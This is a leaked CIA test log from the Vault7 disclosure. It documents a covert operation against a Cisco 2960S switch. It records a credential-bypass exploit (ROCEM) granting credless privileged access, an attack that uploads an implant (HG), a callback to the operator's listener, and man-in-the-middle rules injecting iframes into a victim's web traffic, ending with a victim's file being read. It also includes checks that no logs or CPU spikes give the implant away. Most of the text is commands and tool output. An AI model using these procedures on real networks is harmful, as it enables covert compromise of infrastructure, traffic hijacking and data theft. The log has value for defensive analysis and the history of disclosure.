Vault7: CIA Hacking Tools Revealed

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Owner: User #71467
HG was delivered for JQJHAIRPIECE on 8/21/2015 for the Cisco 2960S. CONOP will be to FLXFluxwire to and then . Testing will be limited to performance testing and SMITE in order to provide a quick turn around for Operator. Also need to test SMITE rules that exclude an internal web server (Xetron can help GIPPLE craft these rules).
Testing summary
- ROC-12 - EAREnterprise Archive 5471 - ROCEM set/unset does not work with flux. This issue was fixed by Xetron in ROCEM v1.2, delivered to TR on 08/27/15
- ROCEM regression testing included - test of set/unset feature fixed, test of complete CONOPConcealed Operation for use with HG, test ROCEM interactive session, and ad-hoc tests
- Received exact model 2960S 8/31 and installed
- Performance testing shows HG has little to no impact at traffic levels tested:
50M no HG | 50M w HG | 500M no HG | 500M w HG | |
CPU Utilization | 8% | 9% | 8% | 9% |
Mem Utilization | 44% | 47% | 44% | 47% |
Latency (ms) | 4 | 4 | 4 | 3 |
- Show tech analysis - fixed output in show stacks command after hg uninstall, fixed init process while HG running, don't see ipv4 security aces increase any more
Testing Notes
Information about target:
- WS-C2960S-24PD-L (testing used WS-C2960S-24PS-L)
- Boot loader version 12.2(55r)SE (testing used 12.2(55r)SE1)
- IOS c2960s-universalk9-mz.122-55.SE8.bin
- Local authentication
- 7 interfaces up - 1,5,6,9,10,20,24
- ports 1,5,6,10 are in VLANVirtual Local Area Network 3
- port 20 is in VLANVirtual Local Area Network 8
- port 24 is uplink trunk
- MGMT IP - int vlan 10 -
- Client mode for VTPVLANVirtual Local Area Network Trunk Protocol domain cisco
- VLANS configured - 1 - 12
- Upstream router - WS-3560G-24-TS running IOSApple operating system for small devices C3560-IPSERVICESK9-M, version 12.2(55)SE9. (testing used WS-C3560G-24PS running IOS C3560-IPSERVICESK9-M, version 12.2(55)SE8)
- Downstream switch - 2960
VMS used
- Hairpiece-ICON-
- Hairpiece-Seeds-Fedora10
- Hairpiece-Flux-
- Hairpiece-Victim -
- Smoke Test - Use ROCEM to throw HG via FLUX
- Configured Seeds traffic on Seeds VMVirtual Machine for Hairpiece network and started ARP, DNSDomain Name System and HTTPSHypertext Transfer Protocol Secure seeds traffic
- Successfully established FLUX connection from Hairpiece-Icon to hairpiece-Flux at
- Sucessfully established rocem interactive mode via flux
- Set rocem
- Could not set/unset rocem through flux, but tried outside of flux and it works fine. For purposes of smoke testing, continuing without flux.
- Set rocem outside of flux
- Attacked with iac
root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1h/attack/linux# ./iac --ip --l cisco:test test
EC -125
EC -159
root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1h/attack/linux# -
Installed HG with remote:
GOOD - status OK.
OP: RUNCODE using Per Second
Code address: 0x044efd34
No data
Result: 0x00000001 - Established CTCounter Terrorism session on port 444 since flux was using port 443. Used Seeds host as IP to trigger.
> ilm listen hairpiece-1h.txt
Listening for clients on port 444...
Accepted connection from
Attempting SSLSecure Socket Layer Handshake...
SSL Handshake Successful!
New Key: lMzoTDqJUimWHf*yOQXqdzvFrk*LgsOzKIqu8blZt98=
************ Success ************
[ilm listen hairpiece-1h.txt][]>
- Created mitm rule:
[]> mitm create http_iframe 0 0 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -en -bc -bk
Job: 136300776
************ Pending ************
[mitm create http_iframe 0 0 X.X.X.XX (LVLT-GOGL-8-8-8[US]) 80 80 http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ -en -bc -bk][]> [Success]
Web browsed from Victim and received iframe:
<body><iframe src="http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ"- Uninstalled HG:
[]> device uninstall_hg -f
This command will remove all capabilities.
If installed, EVExecution Vector capabilities will be wiped, but MAY LEAVE BEHIND ARTIFACTS
Memory permissions will not be reset. See Operational Use Notes for more information.
This connection will be terminated as a result of this command.Do you wish to continue?
Enter yes or no: yes[Success]
************ Success ************
[device uninstall_hg -f][]> [Remote Failure]
************ Remote Failure ************
Connection to device lost!!
- Characterization of ROCEM issues with Flux - ROC-12
- Collected wiresharks of failed set attempts and successful interactive attempts from flux, icon, and rocem log files and sent all to Xetron.
- Tried using -c flag to change chunk size in ROCEM and tried every size in increments of 50 between 100 and 1500 - ROCEM still would not set through flux.
- Tried building a flux node with mtu set to 1500 - no luck, ROCEM would not work.
- Tried using a different flux node, from CMNCaiman (Codename)? testing, at to attempt to flux from outside the network - no difference, rocem would not set.
- IXIA performance test - Baseline - no HG
- Reloaded DUTDevice Under Test to start with a clean configuration
- Set up IXIA test to run on clean device using Hairpiece NN and the following test parameters:
- 50M of constant traffic
- 50 internal hosts
- 50 upstream hosts
- 4 hour test kicked off at 11:40
- Test complete, saved solarwinds grapsh of CPU, MEM and latency. No alarming spikes, switch was not stressed with this amount of traffic.
- Saved test report to share as well.
- IXIA performance test - Repeat test 3 but with HG installed
- Reload DUTDevice Under Test to start with a clean device
- Set ROCEM without using flux
- Attacked with IACInternational Access Code and uploaded HG
- Established CTCounter Terrorism session
- Kicked off IXIA test at 4:30 PM
- Collected output including report and solarwinds and saved to share. Basically no impact when HG added at 50M of traffic.
- IXIA performance test - Higher stress - 500M test - no HG
- Reload DUTDevice Under Test to start with a clean device
- Setup IXIA to run with same parameters as Test 3, except 500M of traffic - Kicked off at 4:20
- Collected Report and solarwinds graphs
- IXIA performance test - Repeat test 5 but with HG installed
- Reload DUTDevice Under Test to start with a clean device
- Set ROCEM without using flux
- Attack with IACInternational Access Code and upload HG
- Establish CTCounter Terrorism session
- Kick off IXIA test at 500M at 9:20 AM
- Received ROCEM on 8/27/15 and began tests for fix to flux
- Loaded new ROCEM v1.2 delivery to ICON workstation
- Established flux connection from ICON to
- Used ROCEM set command - successful:
root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1r/rocem# ./ -s -f fill.bin
[+] Validating data/interactive.bin
[+] Validating data/set.bin
[+] Validating data/transfer.bin
[+] Validating data/unset.bin****************************************
Image: c2960s-universalk9-mz.122-55.SE8
Action: Set
****************************************Proceed? (y/n)y
[*] Attempting connection to host
[+] Connection established
[*] Sending Protocol Step 1
[*] Sending Protocol Step 2
[+] Done Telnetted to cisco and was not prompted for creds
- Unset ROCEM successfully:
root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1r/rocem# ./ -u -f fill.bin
[+] Validating data/interactive.bin
[+] Validating data/set.bin
[+] Validating data/transfer.bin
[+] Validating data/unset.bin****************************************
Image: c2960s-universalk9-mz.122-55.SE8
Action: Unset
****************************************Proceed? (y/n)y
[*] Attempting connection to host
[+] Connection established
[*] Sending Protocol Step 1
[*] Sending Protocol Step 2
[+] Done Telnetted to device and was now prompted for creds again, indicating successful unset.
- Smoke test of complete CONOPConcealed Operation through flux
- Reloaded DUTDevice Under Test to start with a clean device\
- Establish Flux tunne
- Set ROCEM, IACInternational Access Code attack and upload HG
- Unset ROCEM
- Establish HG Comms on port 444
- Rebuilt Flux to use 8443 on ICON box so that HG can call back to 443.
- Established CTCounter Terrorism session with HG
- Created SMITE rule:
mitm create http_iframe 0 0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -en -bc -bk
Successfully exploited Windex victim with iframe, to both coverweb and google:
INFO: CMD >> cat secrets.txt
====== C:\Documents and Settings\Loki Lab\Desktop\secrets.txt
INFO: ====== C:\Documents and Settings\Loki Lab\Desktop\secrets.txt
This is where we keep the double top secret info.
INFO: This is where we keep the double top secret info.
ST2 sess[ 486] >
- Test SMITE rule counter
[]> mitm create http_iframe 0 0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -ac 5 -sm 10 -en -bc -bk
Created rule above to test for setting max sessions affected per host to 5 and overall max sessions to 10
- Browsed from Windex victim 5x and rx iframe 5x successfully.
- Confirmed that after the 5th iframe, further web browsing sessions from the windex victim were not injected. Sessions remaining listed as 5.
- Attempted to browse from Seeds host to confirm no iframe injected for hosts on vlan 3 - did not receive iframe
- Browsed from Windex victim 2 and did rx iframe 5 more times, after fifth time, HG reported no sessions remaining and I received no further iframes.
- Deleted mitm rule
- Did not record any CPU spikes during mitm rules firing
- Test FilterBroker module stop, start
- Turned on 50M of IXIA traffic, enterprise profile
- Confirmed FilterBroker module running with module show:
FilterBroker 22 Yes Running 0x47d5c54 default:FilterBroker.mod - stopped module
[]> module stop FilterBroker
************ Success ************
[module stop FilterBroker][]>
- FilterBroker 22 Yes Stopped 0x47d5c54 default:FilterBroker.mod
- Started filterbroker
[]> module start FilterBroker.mod
************ Success ************
[module start FilterBroker.mod][]>
Did an ilm refresh, then module show:
FilterBroker 22 Yes Running 0x4393d44 default:FilterBroker.mod- Created a new mitm rule - rule successfully created with ID 5
- Deleted rule 5
- Test uninstall of HG
- IXIA traffic running
- uninstalled HG with device uninstall_hg -f
[]> device uninstall_hg -f
This command will remove all capabilities.
If installed, EVExecution Vector capabilities will be wiped, but MAY LEAVE BEHIND ARTIFACTS
Memory permissions will not be reset. See Operational Use Notes for more information.
This connection will be terminated as a result of this command.Do you wish to continue?
Enter yes or no: yes[Success]
************ Success ************
[device uninstall_hg -f][]> [Remote Failure]
************ Remote Failure ************
Connection to device lost!!
No log messages recevied on console
- Test ROCEM v1.2 set and unset - ./ -s -f fill.bin
- With IXIA traffic running, testing multiple ROCEM set/unsets via flux
- Completed 10 rounds of ROCEM set/unset and between each command verified expected behavior on login to switch
- Tried setting ROCEM 5 times in a row - no issues, ROCEM output looks the same each time, no log messages to DUTDevice Under Test console or CPU spikes
- Tried unsetting ROCEM 5 times in a row - no issues, ROCEM output looks the same each time, no log messages to DUTDevice Under Test console or CPU spikes
- Test ROCEM interactive session
- Establish IXIA traffic - 50M
- Verified Flux still active
- Telnet to device to ensure I am challenged for creds - login and rx expected priv level
- Establish ROCEM interactive session:
root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1r/rocem# ./ -i - Execute device survey commands - show run, show arp, show users (shows telnet session from flux ip with no user as expected), show ip int br, show log, show vlan, show version
- Established a non-ROCEM telnet session while ROCEM interactive session active - was challenged for creds and rx expected priv level.
- Exited ROCEM interactive session:
SW-06# exit
Connection closed by foreign host.
[+] Unsetting
[*] Attempting connection to host
[+] Connection established
[*] Sending Protocol Step 1
[*] Sending Protocol Step 2
[+] Done
root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1r/rocem# Telneted back into switch with non-ROCEM user and rx expected challenge for creds and priv level.
- no syslogs generated during this session
- commands run during ROCEM session are not in show history (show history all is not available on this device)
- no spikes in CPU observed during ROCEM interactive session
- Ad hoc - Test ROCEM when non-ROCEM user at Username prompt (with 50M IXIA traffic)
- Established a telnet session to device and left it at the Username: prompt
- Estalished ROCEM interactive session from ICON
- Went back to telnet session and logged in - rx expected priv level
- Exited ROCEM interactive session
- Exited telnet session
- Established a telnet session to device and left it at the Username: prompt
- Set ROCEM from ICON
- Went back to telnet sesion and logged in - rx expected priv level
- Unset ROCEM from ICON
- Exited the telnet session
- Re-telneted to device and rx expected priv level
- No CPU spikes or log messages observed during this test
- Ad-hoc - Test ROCEM when non-ROCEM user at Password: prompt (with IXIA 50M traffic)
- Established a telnet session to device and entered username but left it at the Password: prompt
- Established ROCEM interactive session from ICON
- Went back to telnet session and logged in - rx expected priv level
- Exited telnet session
- Exited ROCEM interactive session
- Established a telnet session to device and entered username but left it at the Password: prompt
- Went back to telnet session and logged in - rx expected priv level and password challenge
- Established a new telnet session in another window to device and as expected got credless priv 15
- exited new telnet session
- Exited telnet session
- Unset ROCEM
- No messages logged or syslogs generated
- Ad-hoc - Test ROCEM configuration changes (with IXIA traffic)
- Establish ROCEM interactive session
- Change interface description
- Exit interactive ROCEM session
- Interface changes were logged, no user reported:
*Mar 3 17:56:03.580: %SYS-5-CONFIG_I: Configured from console by vty0 (
- Test CONOPConcealed Operation again after set/usets, with IXIA traffic
- IXIA traffic running, flx tunnel up
root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1r/rocem# ./ -s
[+] Validating data/interactive.bin
[+] Validating data/set.bin
[+] Validating data/transfer.bin
[+] Validating data/unset.bin****************************************
Image: c2960s-universalk9-mz.122-55.SE8
Host: (y/n)y
[*] Attempting connection to host
[+] Connection established
[*] Sending Protocol Step 1
[*] Sending Protocol Step 2
[+] DoneAction: Set
**************************************** - IAC attack - observed usual high 30s % CPU spike during attack -
root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1h/attack/linux# ./iac --ip --l cisco:test test
EC -125
EC -159
M - Unset ROCEM
root@hairpiece-icon:/home/user1/rocem/ops/hairpiece/hairpiece-1r/rocem# ./ -u
[+] Validating data/interactive.bin
[+] Validating data/set.bin
[+] Validating data/transfer.bin
[+] Validating data/unset.bin****************************************
Image: c2960s-universalk9-mz.122-55.SE8
Action: Unset
****************************************Proceed? (y/n)y
[*] Attempting connection to host
[+] Connection established
[*] Sending Protocol Step 1
[*] Sending Protocol Step 2
[+] Done Used remote to upload HG - no noticeable increase in CPU during HG upload
- Established CTCounter Terrorism session with HG -hairpiece.txt had inter set to fw0, added a bridge in flux for port 443, added a route in flux for (IP HG will impersonate)
[]> beacon call_base_back https 443
Trigger Sequence Number sent: 20
************ Success ************
[beacon call_base_back https 443]> ilm listen hairpiece-1h.txt
Listening for clients on port 443...
Accepted connection from
Attempting SSLSecure Socket Layer Handshake...
SSL Handshake Successful!
New Key: lKrKpz01fbjBOvwswVnnQubw5ybZU74EjnnylEH0A*s=
************ Success ************
[ilm listen hairpiece-1h.txt] - Created SMITE rule
[]> mitm create http_iframe 0 0 80 80 "http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ" -ac 5 -sm 10 -en -bc -bk
Job: 136300856
************ Pending ************
[mitm create http_iframe 0 0 80 80 http://X.X.X.XX (LVLT-GOGL-8-8-8[US]):8888/?promo_code=1Z45RDJ -ac 5 -sm 10 -en -bc -bk] Successfully windexed victim
- Deleted rule
- Uninstalled HG with device uninstall
- No log messages observed on DUT, no cpu spikes.
- On-device opsec test
- reload DUTDevice Under Test to start with clean device
- collect show tech from switch and collect config in RANCID
- with ixia traffic, flux in place, set rocem, iac attack, unset rocem, uploaded hg, establish ct session.
- collect show tech
- uninstall hg
- collect show tech
- Replaced 2960-S with identical match to target - WS-C2960S-24PD-L. Bootldr now also an exact match.
- Repeat ROCEM set/unset and interactive session smoke test on exact platform
- Verify IXIA traffic and flux up
- Successfully used ROCEM interactive session 10 times in a row
- Successfully set/unset ROCEM 10 times in a row, verifying between each that proper creds were required
- No logs or CPU spikes observed
- Complete run through of CONOPConcealed Operation on new switch
- IXIA traffic and Flux running
- Set ROCEM, IACInternational Access Code attack, Unset ROCEM
- Upload HG with remote
- Establish CTCounter Terrorism session
- Execute SMITE against victim - create rule, disable rule, delete rule
- Uninstall HG
- Test ROCEM without Flux
- Without flux, set ROCEM successfully
- Unset ROCEM and verified that creds are required
- Establish ROCEM interactive session
- Exit and verify that creds required